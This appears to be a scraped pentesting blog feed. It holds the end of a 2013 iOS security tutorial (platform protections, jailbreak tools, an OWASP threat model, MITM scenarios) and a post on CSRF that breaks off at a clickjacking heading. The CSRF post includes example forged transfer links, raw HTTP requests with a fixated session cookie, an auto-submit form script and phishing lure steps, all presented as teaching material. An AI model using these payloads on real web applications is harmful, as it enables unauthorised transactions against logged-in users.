<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWUbXWQds0PpbXevvGYF9VNBQ5X9ivyy5sSuF0rqgYeOklm84JSjvFEWO5y7mB_nMlK7Z2rekgD6WLwjOlUh-hJsUuo04UW69lpi5kc15TEBMTnoOo1SygwuIhLPTzf3eaErZjIfFFJrg/s1600/ios-configuration-profiles.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWUbXWQds0PpbXevvGYF9VNBQ5X9ivyy5sSuF0rqgYeOklm84JSjvFEWO5y7mB_nMlK7Z2rekgD6WLwjOlUh-hJsUuo04UW69lpi5kc15TEBMTnoOo1SygwuIhLPTzf3eaErZjIfFFJrg/s1600/ios-configuration-profiles.png" height="366" width="400" /></a></div>
<br />
<b>Note:</b> See how the certificate show in the screenshot. This demonstrates the BOMGAR MDM software, that enforces a custom configuration profile. <br />
<br />
<b>Sand-boxing:</b> All third-party apps are "<i>sandboxed</i>", so they are restricted from accessing files stored by other apps or from making changes to the device. This prevents apps from gathering or modifying information stored by other apps. <u>Each app has a unique home directory for its files, which is randomly assigned when the app is installed.</u> If a third-party app needs to access information other than its own, it does so only by using application programming interfaces (APIs) and services provided by iOS. The downside of this security model is that same rules apply for all apps (a third party app is not allowed to have more restrictive rules than another). <b> </b><br />
<br />
<b>Address space layout randomization (ASLR): </b>ASLR protects against the exploitation of memory corruption bugs. Built-in apps use ASLR to ensure that all memory regions are randomized upon launch. Additionally, system shared library locations are randomized at each device start-up. Xcode, the iOS development environment, automatically compiles third-party programs with ASLR support turned on.<br />
<br />
<b>NX Flag:</b> Further protection is provided by iOS using ARM’s Execute Never (XN) feature, which marks memory pages as non-executable. Memory pages marked as both writable and executable can be used only by apps under tightly controlled conditions: The kernel checks for the presence of the Apple-only “dynamic-codesigning” entitlement. Even then, only a single mmap call can be made to request an executable and writable page, which is given a randomized address. Safari uses this functionality for its JavaScript JIT compiler.<br />
<br />
<b>Jailbreaking your iOS</b><br />
<br />
Jailbreaking is a process that allows these iDevices users to gain the infamous root access to the command line of the iOS operating system, in order to remove usage and access limitations imposed by Apple. Once jailbroken, iPhone users are able to download extensions and themes that are unavailable through the App Store (via installers such as Cydia) and perform other tasks that are not possible on store-bought devices, including installing non-Apple operating systems such as Linux, running multi-task on old version of iDevices (the new Generation of store-bought devices includes this function). Through the authentication server developed by Aurik (a Ph.d student from UCSB) built up to sign old firmware of iOS, Cydia creator Jay Freeman estimates that over 10% of all iPhones are jailbroken.<br />
<br />
Tools you can use for jailbreaking your iPhone are listed alphabetically below (found in theiphonewiki.com):<br />
<br />
A<br />
• Absinthe<br />
B<br />
• Blackra1n<br />
C<br />
• Corona<br />
D<br />
• Dual Boot Exploit<br />
E<br />
• Evasi0n<br />
G<br />
• Greenpois0n (jailbreak)<br />
I<br />
• IBrickr<br />
• ILiberty+<br />
• INdependence<br />
J<br />
• JailbreakMe<br />
L<br />
• Limera1n<br />
M<br />
• Mknod<br />
P<br />
• Pwnage<br />
• PwnageTool<br />
R<br />
• Ramdisk Hack<br />
• Redsn0w<br />
• Redsn0w Lite<br />
• Restore Mode<br />
S<br />
• Seas0nPass<br />
• Sn0wbreeze<br />
• Soft Upgrade<br />
• Spirit<br />
• Star<br />
• Symlinks<br />
Z<br />
• ZiPhone <br />
<br />
<b>Note1:</b> This tutorial was written on 09/March/2013 so an update by performing a research is also required.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Note2:</b> The real question here is do you need to jailbreak your iDevice to pentest it? The answer is it depends, for example if the app you are testing has anti-jailbreaking countermeasures then maybe no, if the app you are testing has no anti-jailbreaking countermeasures then definitely yes. Jailbreak the the testing <u>target iPhone is must when applicable</u>.<br />
<br />
<b>Settings the threat landscape for iOS </b><br />
<br />
What most iOS developers/security consultants do not understand is the threat landscape that is currently associated with the iOS platforms is not clearly defined in their minds, some of them do not even have a clue what is that it should be taken into consideration when performing a Security Assurance, Risk Assessment or Penetration Test to iOS related platform. An iDevice should be treated the thick client on steroids. The features provide from an iOS device are amazing and very rich.<br />
<br />
A good source that can be used as a starting point for developing a threat model for iOS should be the OWASP Mobile Security Project found <a href="https://www.owasp.org/index.php/OWASP_Mobile_Security_Project" target="_blank">here</a>. The Top 10 Mobile Risks, Release Candidate v1.0 covers pretty much all risks that are associated with an iOS device. The following picture summarizes all risks identified:<b> </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrtGm_UO-QWbXmxNhCbLJMwVi4AcoqIq5ISJaLEJ-T-PbxpyTW3u5DmZ1qRUovJwFGCJ4AVCQXzgUpOURywlKDhcfP11Kf5WV408ZNvlYAgfnRgR5vxX7epKBtXOd5wIXkGagYxcXIDc/s1600/800px-Topten.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrtGm_UO-QWbXmxNhCbLJMwVi4AcoqIq5ISJaLEJ-T-PbxpyTW3u5DmZ1qRUovJwFGCJ4AVCQXzgUpOURywlKDhcfP11Kf5WV408ZNvlYAgfnRgR5vxX7epKBtXOd5wIXkGagYxcXIDc/s1600/800px-Topten.png" height="403" width="640" /></a></div>
<br />
<b> Note:</b> Risk M2, M5 and M6 are mostly server side related and I am not going to focus on these issue a lot.<br />
<br />
Risk M1, M4, M8, M7, M9 and M10 are the most interesting of all the issue and I am going to spend a lot of time analyzing these issues. But before we do that it would be wise to focus a little in the type of interaction an iDevice has with the server component. Given the nature of the iOS based devices, and their willingness to blindly accept new configuration, hijacking both cellular traffic and WiFi traffic can usually be performed much more easily than a similar attack to a desktop machine. It is so easy, in fact that, that a device's traffic can be hijacked without even compromising the device itself. There are a number of ways to intercept network traffic across local networks; dozens of articles have been written on the subject. <br />
<br />
The following picture shows a typical Web Server iPhone interaction:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS8515ZBwH1klCoAIEINI4keVAvqI2gLrJu-lTQfXDNio-ej9A3Tuc3-y3ZMVKxHjEhXnaccwTD52aum5GT7Uc8rQZ4EA0G2-fohx0tbceU1RrKlnVk-MX1eTjBejVGQpzBS4TUzJNdZY/s1600/iPhoneBasic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS8515ZBwH1klCoAIEINI4keVAvqI2gLrJu-lTQfXDNio-ej9A3Tuc3-y3ZMVKxHjEhXnaccwTD52aum5GT7Uc8rQZ4EA0G2-fohx0tbceU1RrKlnVk-MX1eTjBejVGQpzBS4TUzJNdZY/s1600/iPhoneBasic.png" height="400" width="211" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Note:</b> This is a simple Web Server, iPhone interaction.<br />
<br />
The following pictures shows a typical attack scenarios that can be implemented very easily by exploiting the iPhone configuration of blindly accepting any wireless access points. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpnd1ILt3cHRR1cH8VYQUigq4hOPtoJ-_xmtsViOsMlPNNuRPXj4ojW6AmfXTa69HHq_Ffp2FBR4BxC9ZJcgz9dRuWpmSCZJXqFBn2zMZ52c0QDRmG7XBD1F9Gejp6LLtQpr_7WMCB-80/s1600/Screen+Shot+2013-03-06+at+22.23.03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpnd1ILt3cHRR1cH8VYQUigq4hOPtoJ-_xmtsViOsMlPNNuRPXj4ojW6AmfXTa69HHq_Ffp2FBR4BxC9ZJcgz9dRuWpmSCZJXqFBn2zMZ52c0QDRmG7XBD1F9Gejp6LLtQpr_7WMCB-80/s1600/Screen+Shot+2013-03-06+at+22.23.03.png" height="320" width="271" /></a></div>
<br />
The following pictures shows a typical <b>Man In The Middle</b> attack scenarios that can be
implemented again very easily due to the nature of the mobile (which by the way are mobile).<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM8VV54qpTyeL_uxZ5nkXULCFXZqzyPoJSSL65umsPG1vQWu7TyQb_zkaAU2Q5I2eEjB68njI_jDpJHe_5S3ZgTd_zq5Fk-WgVSJ8eyzhwUXjdf6YBVaROa0uJ7bhNA8Cj9xxkEM5rTzA/s1600/Screen+Shot+2013-03-09+at+23.33.12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM8VV54qpTyeL_uxZ5nkXULCFXZqzyPoJSSL65umsPG1vQWu7TyQb_zkaAU2Q5I2eEjB68njI_jDpJHe_5S3ZgTd_zq5Fk-WgVSJ8eyzhwUXjdf6YBVaROa0uJ7bhNA8Cj9xxkEM5rTzA/s1600/Screen+Shot+2013-03-09+at+23.33.12.png" height="400" width="382" /></a></div>
<b><br /></b>
<b>Note:</b> The types of attacks that can be performed using the methodology of a rouge access point or the Man In The Middle attack scenarios are going to be explained in the next post.<br />
<b></b><br />
<b>Epilogue</b><br />
<br />
This article covered the threat land scape for iDevices, which is identical for all mobile devices (e.g. iPhone, iPad, iTouch, iPad mini, Android devices etc.). The next part is going to cover Internet/Wireless attacks and the third is going to cover iDevice data attacks (e.g. attacking unencrypted and encrypted attacks). There might be though a fourth part that sums up all attack patterns together. <b> </b><br />
<br />
<b>See part 2 </b><br />
<br />
<b>Reference:</b><br />
<ol>
<li>Hacking and Securing iOS Applications (1st Edition).</li>
<li>iOS Hacker's Handbook </li>
<li><a href="http://theiphonewiki.com/wiki/Main_Page">http://theiphonewiki.com/wiki/Main_Page</a></li>
<li><a href="http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CFgQFjAB&url=http%3A%2F%2Fwww.mcafee.com%2Fuk%2Fresources%2Fwhite-papers%2Ffoundstone%2Fwp-pen-testing-iphone-ipad-apps.pdf&ei=Qao3UdfuIsi0PN_igZgL&usg=AFQjCNEcgkmrLlHGnZAbIqsMAUZo7AV40Q&sig2=SVQsXTDllnOzoSiE0b9xnQ&bvm=bv.43287494,d.ZWU&cad=rja">http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CFgQFjAB&url=http%3A%2F%2Fwww.mcafee.com%2Fuk%2Fresources%2Fwhite-papers%2Ffoundstone%2Fwp-pen-testing-iphone-ipad-apps.pdf&ei=Qao3UdfuIsi0PN_igZgL&usg=AFQjCNEcgkmrLlHGnZAbIqsMAUZo7AV40Q&sig2=SVQsXTDllnOzoSiE0b9xnQ&bvm=bv.43287494,d.ZWU&cad=rja</a></li>
<li><a href="http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CEEQFjAC&url=http%3A%2F%2Freverse.put.as%2Fwp-content%2Fuploads%2F2011%2F06%2Fios_jailbreak_analysis.pdf&ei=Lq03UbeEG4vTPICwgZAF&usg=AFQjCNFEFYQasjKS015rXOIscZcD7gt0SQ&sig2=b9zMPuqnxltdEjscnBw9kA&bvm=bv.43287494,d.d2k&cad=rja">http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CEEQFjAC&url=http%3A%2F%2Freverse.put.as%2Fwp-content%2Fuploads%2F2011%2F06%2Fios_jailbreak_analysis.pdf&ei=Lq03UbeEG4vTPICwgZAF&usg=AFQjCNFEFYQasjKS015rXOIscZcD7gt0SQ&sig2=b9zMPuqnxltdEjscnBw9kA&bvm=bv.43287494,d.d2k&cad=rja</a></li>
<li><a href="http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&docid=uXJZS5Ygd8EA2M&tbnid=bBuu1xIxavm7BM:&ved=0CAUQjRw&url=http%3A%2F%2Finstitute.mobileappmastery.com%2Fiostrainingpack%2Fios-training-pack-orientation%2F&ei=f_c4Ueq4GMbM0AXHwIH4CA&psig=AFQjCNGXxNtGeXVosrZpTPL02jXebHN5KA&ust=1362774242464377">http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&docid=uXJZS5Ygd8EA2M&tbnid=bBuu1xIxavm7BM:&ved=0CAUQjRw&url=http%3A%2F%2Finstitute.mobileappmastery.com%2Fiostrainingpack%2Fios-training-pack-orientation%2F&ei=f_c4Ueq4GMbM0AXHwIH4CA&psig=AFQjCNGXxNtGeXVosrZpTPL02jXebHN5KA&ust=1362774242464377</a> </li>
<li><a href="http://www.techotopia.com/index.php/Working_with_iOS_6_iPhone_Databases_using_Core_Data">http://www.techotopia.com/index.php/Working_with_iOS_6_iPhone_Databases_using_Core_Data</a> </li>
<li><a href="https://www.owasp.org/index.php/OWASP_Mobile_Security_Project">https://www.owasp.org/index.php/OWASP_Mobile_Security_Project</a></li>
<li><a href="http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0CDEQFjAA&url=http%3A%2F%2Fimages.apple.com%2Fipad%2Fbusiness%2Fdocs%2FiOS_Security_May12.pdf&ei=E407UZH6Io2o0AXp1oDoDA&usg=AFQjCNEEEm92vnkqK28D_y3D60VtJiYOTg&sig2=go27HN00qxc7oZ3cXgFecw&bvm=bv.43287494,d.d2k&cad=rja">http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0CDEQFjAA&url=http%3A%2F%2Fimages.apple.com%2Fipad%2Fbusiness%2Fdocs%2FiOS_Security_May12.pdf&ei=E407UZH6Io2o0AXp1oDoDA&usg=AFQjCNEEEm92vnkqK28D_y3D60VtJiYOTg&sig2=go27HN00qxc7oZ3cXgFecw&bvm=bv.43287494,d.d2k&cad=rja</a> </li>
<li><a href="http://support.apple.com/kb/HT1808">http://support.apple.com/kb/HT1808</a> </li>
<li><a href="https://developer.apple.com/programs/ios/">https://developer.apple.com/programs/ios/</a> </li>
</ol>
<br /><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-90106588270916810312012-12-26T10:24:00.001-08:002013-09-23T01:30:33.131-07:00CSRFing the Web...<b>Introduction</b><br />
<div>
<br />
Nowadays hacking, as already mentioned in my previous articles, has been industrialized, meaning that professional hackers are constantly hired to make money out of practically anything and therefore all Web Application vulnerabilities have to be understood and defeated. <br />
<br />
This article is going to talk about what Cross Site Request Forgery (CSRF) is, explain how can someone perform a successful CSRF attack and describe how to amplify a CSRF attack (e.g. combine CSRF with other vulnerabilities). CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated (simplistically speaking). With a little help from social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. <br />
<br />
A successful CSRF exploit can compromise end user data and operation in case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application. More specifically CSRF is a Web Application vulnerability that has to exploit more than one design flaws in order to be successful. The design flaws that a CSRF attack can take advantage of are:<br />
<ol>
<li>Input Validation (e.g. Convert POST to GET) </li>
<li>Access Control (e.g. Session Fixation) </li>
<li>Privilege Assignment (e.g. Horizontal Privilege Escalation)</li>
</ol>
<b>Note: </b>Of course depending on the situation other type of vulnerabilities can be combined with a CSRF as part of a post exploitation process such as SQL Injection (e.g. SQL Inject the cookie and get access to valid cookie repository in the database).<br />
<br />
<b>History of CSRF</b><br />
<br />
CSRF vulnerabilities have been known and in some cases exploited since 2001. Because it is carried out from the user's IP address, some website logs might not have evidence of CSRF. Exploits are under-reported, at least publicly, and as of 2007 there are few well-documented examples. About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008. Customers of a bank in Mexico were attacked in early 2008 with an image tag in email. The link in the image tag changed the DNS entry for the bank in their ADSL router to point to a malicious website impersonating the bank.</div>
<div>
<br /></div>
<div>
<b>Severity of CSRF</b></div>
<div>
<br /></div>
<div>
According to the United States Department Of Homeland Security the most dangerous CSRF vulnerability ranks in at the 909th most dangerous software bug ever found. Other severity metrics have been issued for CSRF vulnerabilities that result in remote code execution with root privileges as well as a vulnerability that can compromise a root certificate, which will completely undermine a public key infrastructure.</div>
<div>
<b><br /></b></div>
<div>
<b>But what exactly is a CSRF</b></div>
<div>
<br /></div>
<div>
CSRF is a form of confused deputy attack. Imagine you’re a malcontent who wants to harm another person in a maximum security jail. You’re probably going to have a tough time reaching that person due to your lack of proper credentials. A potentially easier approach to accomplish your misdeed is to confuse a deputy to misuse his authority to commit the dastardly act on your behalf. That’s a much more effective strategy for causing mayhem.</div>
<div>
<br />
In the case of a CSRF attack, the confused deputy is your browser. After logging into a website, the website will issue your browser an authentication token within a cookie (well not always). Within each subsequent http POST or GET requests send, the cookie bind to the request will let the site know that you are authorized to take whatever action you’re taking. Here I am referring to a typical authentication and authorization scheme that most Web Application use.<br />
<br />
Suppose you visit a malicious website soon after visiting your bank website or visit another website while being logged to your bank web account. Your session on the previous site might still be valid (btw please de-validate session before closing the browser). Thus, visiting a carefully crafted malicious website (perhaps you clicked on a spam link) could cause an Html form post to the previous website. Your browser would send the authentication cookie back to that site and appear to be making a request on your behalf, even though you did not intend to do so.<br />
<br />
<b>Yes but what is a CSRF</b><br />
<br />
A CSRF is a POST or GET http request that when send to the vulnerable Web Application under certain conditions can cause the Web Application to perform an action on behalf of the user. Now meaningful CSRF attacks are those that can cause loss of Integrity or Confidentiality or Availability of the victim user data. For example if an e-Banking Web site is vulnerable to CSRF and the function of the Web Site that is vulnerable is responsible for transferring money, then this is a CSRF with high severity and should be fixed.</div>
<div>
<br /></div>
<div>
This is an example of a simple CSRF:<br />
<br /></div>
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr>
<td>http://www.vulnerable.com/?transferEuros=3000?maliciousUserAccount=9832487 </td>
</tr>
</tbody></table>
<div>
<br /></div>
<div>
<b>Note:</b> The link displayed above when clicked can authorize a malicious user to transfer 3000 euros from of the victim user account to the malicious user account with id 9832487, assuming of course that no proper counter measures have been taken.</div>
<div>
<br />
The following diagram shows how can this happen more analytically: </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaspRDp99PLR6G5IZ0kp97tyTjr4zS8ZWrWqANS30Bb6nkIPX8Ssb_1szezXA54_WAo6F3SgjrSpmgKsdaIMO4GzveBRORCVFNGkBmviMaP8LF8NjdO4JS3DJ0TjnEEFMeIOqkgELKZxk/s1600/Drawing1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaspRDp99PLR6G5IZ0kp97tyTjr4zS8ZWrWqANS30Bb6nkIPX8Ssb_1szezXA54_WAo6F3SgjrSpmgKsdaIMO4GzveBRORCVFNGkBmviMaP8LF8NjdO4JS3DJ0TjnEEFMeIOqkgELKZxk/s1600/Drawing1.png" /></a></div>
<br />
<br /></div>
<div>
<b>Note:</b> The diagram above shows the steps an attacker can take to exploit the vulnerability (step 4 designtes the execution of the CSRF payload that performs the malicious action). It is pretty much similar to a Cross Site Script attack scenario. An attacker sends an e-mail to an Html enabled e-mail client that contains some sample images deliberately uploaded to a malicious server (controlled by the attacker), along with the malicious URL (or a malicious html form) that performs the CSRF function, waits until the user opens the e-mail and downloads the images or sets his/her e-mail to receive a notification when the victim user reads his/her e-mail. Thens he/she waits infront of the logs of the malicious image server or waits to receive a read e-mail receipt in his/her mailbox. After the image is downloaded or the read receipt is received he/she will try to verify that the malicious function was executed. Another scenario would be to calculate what times user interact with the web site and calculate the attack times before sending the malicious URL/Html form.<br />
<br />
The diagram above explains that the CSRF (meaning the vulnerable link described previously) can be injected into an HTML enabled e-mail and be executed by a legitimate user. Now if the link (or else the CSRF vulnerable link) is bind to the Web Application session (which it should be) then the victim <u>user would have to be logged to the vulnerable Web Application for the attack to be successful</u>. If the link is not bind to the Web Application session then the this is not a CSRF vulnerability, is an Insecure Direct Object References vulnerability or Failure to Restrict URL Access also described by OWASP top 10 chart. Both vulnerabilities have to do with inappropriate access control and are completely irrelevant to CSRF or CSRF like vulnerabilities.<br />
<br />
Now that you got a better grasp of what a CSRF attack is I can be more technical and explain more on how a CSRF attack look like by using http requests. So again the link described above looks as a Http request like that:<br />
<br />
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr><td>GET /homepage/transferEuros=3000?maliciousUserAccount=9832487 HTTP/1.1</td></tr>
<tr><td>Host: victim.com</td></tr>
<tr><td>Keep-Alive: timeout=15</td></tr>
<tr><td>Connection: Keep-Alive</td></tr>
<tr><td>Cookie: Authentication-Token</td></tr>
<tr><td>Accept: */*</td></tr>
</tbody></table>
<br />
<b>Note:</b> The vulnerable link when clicked will generate the GET request shown above and will, if it is successful, generate a 200 Http response message saying that the transaction was completed successfully.<br />
<br />
<b>Explaining more what a CSRF is</b><br />
<b><br /></b>
The following diagram shows thoroughly how a CSRF can be exploited:<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPu2NMEc3Ig0YbLUAMsEItnG7r1H-RLm5CALwG0LSK_JnOT1W5qvqFCx86X-tM5_rcc84xiiRE9u4hV70wjTO-ZKQbLBMhNak64R2IjGXICK_7EQf-9miwySN7mRKDMrj6NNy3prFByIQ/s1600/Drawing2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPu2NMEc3Ig0YbLUAMsEItnG7r1H-RLm5CALwG0LSK_JnOT1W5qvqFCx86X-tM5_rcc84xiiRE9u4hV70wjTO-ZKQbLBMhNak64R2IjGXICK_7EQf-9miwySN7mRKDMrj6NNy3prFByIQ/s1600/Drawing2.jpg" /></a></div>
<br />
<b>Step 1</b>: Mallory sends a phishing email to Bob, inviting him to visit her web server in order, for example, to win an iPhone 5. She has already created a web page at her web server with a hidden request to the Web Application where Bob is logged in. She has added some buttons to lure the victim in order to click on her page and win the iPhone!<br />
<div class="p1">
<b><br /></b></div>
<div class="p1">
<b>Step 2</b>: Bob visits the page at Mallory's Web server. Maybe he is greedy or he may not, however he clicks on the button in order to win the iPhone!...</div>
<div class="p1">
<b><br /></b></div>
<div class="p1">
<b>Step 3</b>: The forged request is "legitimized" with Bob's logged-in session and is executed at the web application.<br />
<br />
A real-world analogy would be the following: Mallory presented a bank cheque to Bob and Bob puts under his name and signature, but haven't examined what sum of money is written on the cheque.In the following attack scenario, we can see how a malicious user can add a user to a web application just by fooling a logged-in administrator to click on a link.<br />
<b><br /></b>
<b>A different approach to CSRF</b></div>
<b><br /></b>
Now that I explained a simple CSRF attack it is time to explain a more advanced scenario on how to exploit a CSRF. A CSRF most of the time is not easily recognizable and that is why lots of people cannot identify a CSRF unless it is really obvious, just like the one I just described. A CSRF issue raises when:<br />
<ol>
<li>A Web Application performs critical functions using GET Http requests (e.g. to transfer money, add users by just clicking a link etc).</li>
<li>Does not distinguish between POST and GET requests (e.g. a Html form can be easily converted into a GET request, meaning that a Html POST request can be converted to a link etc). </li>
<li>Has a loose association or else not tight access control (e.g. does not use AntiCSRF tokens, is vulnerable to session fixation e.t.c).</li>
<li>Is vulnerable to Cross Site Scripting (e.g. someone can use JavaScript to formate a valid Html POST form by using the XMLHTTP object along with an auto submit script etc). </li>
<li>The application is passing the session to the URL along with the AntiCSRF token.</li>
<li>The session can be fixated and the AntiCSRF token is predictable or static.</li>
</ol>
<b>Note:</b> There are a lot more ways to perform a CSRF attack, but there are out of scope.<br />
<b><br /></b>
<b>CSRF and POST to GET Interchange</b><br />
<br />
It is common knowledge that when the Web Application does not distinguish between POST and GET requests an attacker can convert a POST Http request to a GET Http request and generate a link equivalent to the one described previously. Burp Suite does that automatically that from the proxy tab by right clicking the request and doing a change method (it also recalculates the Http request size in the content size field).<br />
<br />
The attack just described is can be enhanced by using an auto submit script such as this one:<br />
<br />
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr>
<td>"JavaScript"> setTimeout('document.CSRFHtmlForm.submit()',5000); </td>
</tr>
</tbody></table>
<br />
<b>Note:</b> A very useful tool is the CSRF PoC tool also found in Burp Suite. Burp Suit CSRF PoC will generate a quick CSRF PoC for you (most of the time you would have to modify that to be realistic).<br />
<br />
<b>CSRF and Cross Site Scripting (XSS)</b><br />
<br />
Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.<br />
<br />
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. But can also inject an Html form with an auto submit script to execute the malicious CSRF. The example is very easy to understand so I wont have to give an example.<br />
<br />
<b>Note1:</b> You can see how an XSS vulnerability can be combined with a CSRF attack at the CSRF tool section (e.g. by injection also the auto submit javascript code along with the CSRF).<br />
<br />
<b>Note2:</b> Of course an XSS can be combined with a CSRF attack using the XMLHTTP and auto submit javascript features. A very good XSS (XMLHTTP)/CSRF example can be found <a href="http://ajaxian.com/archives/gmail-csrf-security-flaw" target="_blank">here</a>. The specific post explains an XSS/CSRF bug found in gmail.<br />
<br />
<b>CSRF and Session Fixation</b></div>
<div>
<br />
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists of inducing a user to authenticate himself with a known session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.<br />
<br />
The session fixation attack is a class of Session Hijacking, which steals the established session between the client and the Web Server after the user logs in. Instead, the Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in. There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common technique:<br />
<ul>
<li>Session token in the URL argument: The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.</li>
</ul>
<ul>
<li>Session token in a hidden form field: In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in the evil web server or directly in html formatted e-mail.</li>
</ul>
<ul>
<li>Session ID in a cookie:</li>
<ul>
<li>Client-side script:</li>
<ul>
<li>Most browsers support the execution of client-side scripting. In this case, the aggressor could use attacks of code injection as the XSS (Cross-site scripting) attack to insert a malicious code in the hyperlink sent to the victim and fix a Session ID in its cookie. Using the function document.cookie, the browser which executes the command becomes capable of fixing values inside of the cookie that it will use to keep a session between the client and the Web Applicatio</li>
</ul>
</ul>
</ul>
<ul><ul>
<li><META> tag:</li>
<ul>
<li><META> tag also is considered a code injection attack, however, different from the XSS attack where undesirable scripts can be disabled, or the execution can be denied. The attack using this method becomes much more efficient because it's impossible to disable the processing of these tags in the browsers.</li>
</ul>
</ul>
</ul>
After describing the Session Fixation attack I will explain the attack scenario described in the picture using new chain of vulnerabilities (e.g. Session Fixation -> CSRF). An attacker sends an e-mail to an Html enabled e-mail client that contains some sample images uploaded to a malicious server, along with the malicious URL that performs the CSRF function <u>and this time is bind to the fixed session (by using one or more of the techniques described above)</u>, waits until the user opens the e-mail and downloads the images or sets his/her e-mail to receive a notification when the victim user reads his/her e-mail. Thens he/she waits the logs of the malicious image server to be updated or waits to receive a read e-mail receipt in his/her mailbox. After the image is downloaded (and he/she sees that from e.g. /www/var/apache.logs etc) or the read receipt is received he/she will try to verify that the malicious function was executed.<br />
<div>
<br /></div>
<div>
The link with the fixated token will produce a GET Http request that looks like this:</div>
<div>
<br /></div>
<table align="center" bgcolor="00CCFF" border="1">
<tbody>
<tr><td>GET /homepage/transferEuros=3000?maliciousUserAccount=9832487 HTTP/1.1</td></tr>
<tr><td>Host: victim.com</td></tr>
<tr><td>Keep-Alive: timeout=15</td></tr>
<tr><td>Connection: Keep-Alive</td></tr>
<tr><td>Cookie: <span style="color: red;">Fixated Session </span></td></tr>
</tbody></table>
</div>
<br />
<div>
<b>Note1:</b> Obviously a Session Fixation attack can have devastating results even without the use of CSRF flaw. What I am saying here is that a Session Fixation combined with a CSRF attack amplifies the attack (e.g. the attacker will optimize his/her time attack frame by exploiting a chain of vulnerabilities rather than a single vulnerability).<br />
<div>
<div style="font-weight: bold;">
<br /></div>
<b>Note2:</b> Similar exploitation scenarios you can have when the web application does not provide the user with an authentication mechanism e.g. <u>open registration forms used for submitting credit card details</u>.<br />
<br />
<b>CSRF and bad architecture design</b><br />
<br />
Although this category might not be exactly a CSRF issue, it is still very similar to a CSRF attack. This type of attack refers to the occasions were no proper random values are generated (based on user credentials) or values that are generated but do not have a session like behavior e.g. lack of authorization, none random CAPTCHA, lack of entity authentication etc. By integrating this type of behavior to your application you endanger the application to became victim to multiple type of attacks. <br />
<div>
<br /></div>
</div>
<div style="font-weight: bold;">
CSRF and Clickjaking</div>
</div>
<br />
